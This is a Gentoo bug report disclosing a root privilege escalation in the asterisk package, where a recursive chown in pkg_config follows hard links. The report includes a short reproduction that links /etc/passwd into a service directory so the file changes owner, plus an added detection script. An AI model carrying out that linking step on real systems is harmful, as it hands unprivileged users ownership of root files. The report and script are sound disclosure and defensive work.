Bug 630918

Summary: net-misc/asterisk: root privilege escalation via "chown -R" in pkg_config
Product: Gentoo Security
Reporter: Michael Orlitzky <mjo>
Component: Auditing
Assignee: Gentoo Security <security>
Status: RESOLVED DUPLICATE
Severity: normal
CC: jaco, proxy-maint, security-audit
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
Whiteboard:
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2017-09-13 18:25:16 UTC
The asterisk ebuilds call "chown -R" on a few directories during the pkg_config phase:

  pkg_config() {
      ...
      for x in spool run lib log; do
          chown -R asterisk:asterisk "${ROOT}"var/${x}/asterisk
          chmod -R u=rwX,g=rwX,o=    "${ROOT}"var/${x}/asterisk
      done

      chown -R root:asterisk  "${ROOT}"etc/asterisk
      chmod -R u=rwX,g=rwX,o= "${ROOT}"etc/asterisk

This can be exploited by the "asterisk" user to gain root. If he places a hard link to a root-owned file in any of those directories, then the next time pkg_config is run, it will give ownership of root's file to the "asterisk" user. For example,

  1. emerge asterisk
  2. su -s /bin/sh -c 'ln /etc/passwd /var/lib/asterisk/x' asterisk
  3. emerge --config asterisk
  4. /etc/passwd is owned by asterisk:asterisk
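
An audit for the condition described above, as an added example that is not part of the bug report or the asterisk ebuild: it lists regular files with more than one hard link under a tree and refuses to proceed if any exist. The function names and the demo files are hypothetical and constructed for illustration.

```shell
#!/bin/bash
# Added example: audit a directory tree before a recursive chown/chmod.
# Function names are hypothetical; this is not the ebuild's code.

# List regular files under "$1" whose inode has more than one name.
# chown acts on the inode, so every other name of such a file (possibly
# outside the tree, e.g. a root-owned file) would change owner as well.
find_multilinked() {
    find "$1" -xdev -type f -links +1 -print
}

# Report the kernel hard-link restriction. With fs.protected_hardlinks=1 a
# user cannot link to a file they do not own unless they can read and write it.
hardlink_protection() {
    local f=/proc/sys/fs/protected_hardlinks
    if [ -r "$f" ]; then cat "$f"; else echo unknown; fi
}

# Return 0 only if the tree holds no multiply-linked regular files.
# Findings go to stderr so the caller can log them.
audit_before_chown() {
    local tree=$1 hits
    hits=$(find_multilinked "$tree")
    if [ -n "$hits" ]; then
        printf 'refusing recursive chown of %s; multiply-linked files:\n%s\n' \
            "$tree" "$hits" >&2
        return 1
    fi
    return 0
}

# Constructed demo: "secret" stands in for a root-owned file outside the
# service directory; "x" is a second name for it inside the directory.
demo() {
    local tmp rc=0
    tmp=$(mktemp -d) || return 2
    mkdir "$tmp/service" && echo data > "$tmp/secret"
    ln "$tmp/secret" "$tmp/service/x"
    audit_before_chown "$tmp/service" 2>/dev/null || rc=$?
    rm -rf "$tmp"
    echo "$rc"    # 1: the audit flagged the tree
}
```

The audit is a detection aid rather than a fix: a link created between the check and the chown is not seen, so the check is only reliable when the unprivileged user cannot write to the tree while it runs.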
Comment 1 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:16:33 UTC
Unrestricting and reassigning to security@ per bug #705894
Comment 2 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:18:01 UTC
unrestricting per bug 705894
Comment 3 Sam James archtester gentoo-dev Security 2020-05-21 22:22:56 UTC
I think this was resolved at the same time as bug 602722.

@jaco, is that right?
Comment 4 Jaco Kroon 2020-05-22 07:04:45 UTC
(In reply to Sam James (sec padawan) from comment #3)
> I think this was resolved at the same time as bug 602722.
> 
> @jaco, is that right?

Duplicate yes.

*** This bug has been marked as a duplicate of bug 602722 ***